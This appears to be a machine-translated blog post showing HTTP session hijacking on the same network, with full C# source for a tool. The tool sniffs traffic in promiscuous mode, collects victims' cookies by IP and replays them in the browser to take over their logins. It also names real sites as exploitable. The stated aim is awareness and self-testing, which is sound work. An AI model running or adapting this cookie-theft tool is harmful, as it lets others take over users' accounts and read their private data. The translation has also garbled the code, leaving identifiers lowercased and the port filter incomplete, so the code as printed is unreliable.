Watch 48 seconds of animation, so you don't dare to sign in to the HTTP website again (complete sample code included)

The original text goes to: http://www.cnblogs.com/baibaomen/p/http-session-hijack.html

In the My single Sign-on SSO sample code article, it is strongly not recommended to deploy the SSO service point for HTTP.

This write a network packet sniffing based HTTP session hijacking program, give everyone a visual harm display.

Example, I'm logging on to 58 in a single Mac and being hijacked by another program on Windows. "Hacker" to view my information unimpeded, but also to change my avatar.

Just show the animation, 48 seconds:

Original Address: HTTP Session Hijacking example-Single sign-on SSO

58 of users in the same city are using HTTPS, still escaped session hijacking. Most of the more standardized sites, are similar to the mode: Login with HTTPS, the main traffic to go HTTP.

The test found that the use of this mode of the site, including CSDN, QQ mailbox (yes it even has HTTP version), and so on, many have not done session hijacking immunity. Blog Park actually also in the recruit, but it put sensitive operation all put to HTTPS, so not much influence.

In fact, for the use of HTTP traffic, HTTPS walk authentication site, slightly modified, is able to session hijacking immunity. Major websites can download my program self-examination whether there is a flaw, I can provide targeted immune patch support.

The following is the main code for the example, quite simply, referencing the pcap.net component, which requires the corresponding installation WinPcap. Network packet sniffing based on this component is only a way to do session hijacking, and there are application limitations, the example code is more a demo program than a hacker tool. Here's what's going on.

Want to follow up the latest code also please watch me on GitHub Source: Https://github.com/baibaomen/Baibaomen.HttpHijacker

Using pcapdotnet.core;using pcapdotnet.packets;using system;using system.collections.concurrent;using System.collections.generic;using system.diagnostics;using system.linq;using system.runtime.interopservices;using System.text;using system.threading.tasks;using system.windows.forms;namespace Baibaomen.HttpHijacker{Public        Partial class Formhijacker:form {///<summary>//The cookie collection of each device that is sniffed.  </summary> concurrentdictionary<string, concurrentdictionary<string, string>> clientcookies =        New concurrentdictionary<string, Concurrentdictionary<string, string>> ();        Public Formhijacker () {InitializeComponent ();        } private void Formhijacker_load (object sender, EventArgs e) {starthijack (); } public void Starthijack () {Task.run (Delegate {Ilist<livepacketdevic e> alldevices = Livepacketdevice.alllocalmachiNe if (Alldevices.count = = 0) {MessageBox.Show ("Nic not found. Make sure the WinPcap is installed.                    ");                Return                    } foreach (Var selecteddevice in alldevices) {Task.run (delegate {Packetcommunicator Communicator = Selecteddevice.open (65536                        , packetdeviceopenattributes.promiscuous, 1000); if (Communicator.                        Datalink.kind! = datalinkkind.ethernet) {return; } using (Berkeleypacketfilter filter = Communicator. Createfilter ("TCP and DST Port)") {Communicator.                        SetFilter (filter); } communicator.                    Receivepackets (0, Packethandler);                }); } this. BeginInvoke (New EventHandler(Delegate {lbmsg.text = "listener started";            }));        }); private void Packethandler (Packet Packet) {try {var SourceIP = Pack Et.                Ethernet.IpV4.Source.ToString (); var http = packet?. Ethernet?. IpV4?. Tcp?.                Http; if (http = = NULL | | http.                Header = = null) return; if (HTTP. Isrequest && http. IsValid) {String msg = http.                    Decode (Encoding.UTF8);                    Intercepts only web page body requests. if (!string. IsNullOrEmpty (msg)) {var lines = Msg.                        Split (new string[] {"\ r \ n"}, stringsplitoptions.removeemptyentries); var host = lines. FirstOrDefault (x = X.startswith ("Host:"))? Substring ("Host:".)                        Length); var cookie = lines. FirstOrDefault (x = X.startswith ("Cookie:"))? Substring ("Cookie:".                        Length); if (string.IsNullOrEmpty (host)) return; if (!string.  IsNullOrEmpty (cookie)) {var ccookies = Clientcookies.getoradd (SourceIP,                            New concurrentdictionary<string, string> ());                        Ccookies.addorupdate (host, Cookie, (key, Oldval) and Cookie); } if (Msg. StartsWith ("GET") && (Msg. Contains ("\naccept:text/html") | | Msg.                        Contains ("\naccept:text/plain"))//Sift out requests for resource files, etc. to make the data cleaner. {var pathandquery = lines[0]. Substring (0, Lines[0]. LastIndexOf ("http/")). Substring ("GET").                            Length); This. BeginInvoke (new EventHandler (Delegate {lstSessions.Items.Insert (0, $ "{Sourceip}\t{datetime .                            Now}\thttp://{host + pathandquery} ");                        }));  }}}} catch//may be sniffing data incomplete and discarded.          {}} [DllImport ("Wininet.dll", CharSet = CharSet.Auto, SetLastError = True)] Pu        Blic static extern bool InternetSetCookie (string lpszurlname, String lbszcookiename, string lpszcookiedata);            private void Btnhijack_click (object sender, EventArgs e) {var selected = Lstsessions.selecteditem;                if (selected = = null) {MessageBox.Show ("Select the session to be hijacked");            Return } var segments = selected. ToString ().            Split (' \ t ');            var ip = segments[0];            var url = segments[2];            var cookies = Clientcookies[ip]; foreach (var domaincookie in cookies)//Set cookie to browse cookie {foreach (var item in Domaincookie .                Value.split (';')) {try {var name = Item.} Substring (0, item. IndexOf (' = ')).                        Trim (); var value = Item. Substring (item. INdexof (' = ') + 1);                             InternetSetCookie ("http//" + Domaincookie.key, name, Value + "; expires=" + DateTime.UtcNow.AddMinutes (10).                    ToString ("R")); The catch {}//has no conforming data.                The sniffer data may be incomplete and discarded. }} if (Lstsessions.selecteditem! = null) {Process.Start ("Iexplore.exe",            URL); }        }    }}

Session hijacking can occur in a number of places/pathways:

1. via a specially provisioned router/switch; all hubs; virtual machines on the same physical machine
2. All Internet agents
3. Local area network that can be attacked by ARP
4. Unsecured wireless network
5. Network operators have the ability to hijack. Previous visits to the HTTP Web site often saw the ads injected by the network operator, indicating that it was parsing the HTTP data

It can be seen that there is a wide range of session hijacking scenarios.

This example uses the first approach mentioned above, which has great limitations. This is because, in addition to some units or schools are still using cheap hub, mostly through routers, switches access to the network. Only machines that are specifically configured and specified on supported devices can sniff packets from other machines.

For virtual machines on the same physical machine, because they correspond to a physical NIC, you can sniff each other's data without setting it on the switch or router. Using a virtual machine environment is a quick way to run this example.

Watch 48 seconds of animation, so you don't dare to sign in to the HTTP website again (complete sample code included)